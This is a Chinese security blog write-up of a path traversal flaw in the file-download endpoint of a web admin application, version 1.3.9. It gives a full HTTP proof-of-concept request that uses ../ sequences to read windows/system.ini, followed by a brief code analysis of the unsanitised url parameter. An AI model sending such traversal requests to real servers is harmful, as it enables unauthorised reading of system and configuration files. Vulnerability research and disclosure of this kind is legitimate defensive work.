侵权声明

本文章中的所有内容（包括但不限于文字、图像和其他媒体）仅供教育和参考目的。如果在本文章中使用了任何受版权保护的材料，我们满怀敬意地承认该内容的版权归原作者所有。

如果您是版权持有人，并且认为您的作品被侵犯，请通过以下方式与我们联系： [360619623@qq.com]。我们将在确认后的合理时间内采取适当措施，包括删除相关内容。

感谢您的理解与支持

基本信息

版本

1.3.9

poc

GET /ok_admin/file/download?title=1.txt&url=../../../..//windows/system.ini HTTP/1.1
Host: host
Accept: */*
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.112 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: thinkphp_show_page_trace=0|0; thinkphp_show_page_trace=0|0; deviceid=1722062988348; xinhu_ca_rempass=0; xinhu_mo_adminid=yy0nm0mjj0mjn0vy0mmj0vk0mmn0mjm0iq0mjz0mjz0iv0vi0iu0nv07; xinhu_ca_adminuser=rock; t00ls=e54285de394c4207cd521213cebab040; t00ls_s=YTozOntzOjQ6InVzZXIiO3M6MjY6InBocCB8IHBocD8gfCBwaHRtbCB8IHNodG1sIjtzOjM6ImFsbCI7aTowO3M6MzoiaHRhIjtpOjE7fQ%3D%3D; PHPSESSID=07f45a88aedf0c829e74d1691cd62ad4; thinkphp_show_page_trace=0|0
Connection: keep-alive

分析

通过poc找到文件下载函数

可以看到通过get请求获取了url参数和title参数，其中public_path()是获取网站根目录的绝对地址。其中url参数和路径直接拼接，如果url中存在../则可以进行目录跳转。
继续跟进download()函数

Response::create($filename, 'file')根据filename下载文件
name($name)下载后保存名为name

复现

总结

多留意文件、图片等下载按钮和连接
这是我自己今年找到的漏洞，但是有大佬在去年已经提交过cve了o(╥﹏╥)o

免责声明

本博客所提供的技术知识和信息仅旨在教育和分享网络安全最佳实践，促进网络安全意识的提升。作者严禁将这些技术和信息用于任何非法或不道德的目的。

使用本博客内容而导致的任何违法行为或后果，作者不承担任何法律责任。所有读者在使用本博客的信息时，应自行承担风险，并确保遵守当地法律法规。

我们鼓励所有读者合法地使用所提供的信息和技术，致力于维护安全和负责任的网络环境。

感谢您的理解与支持。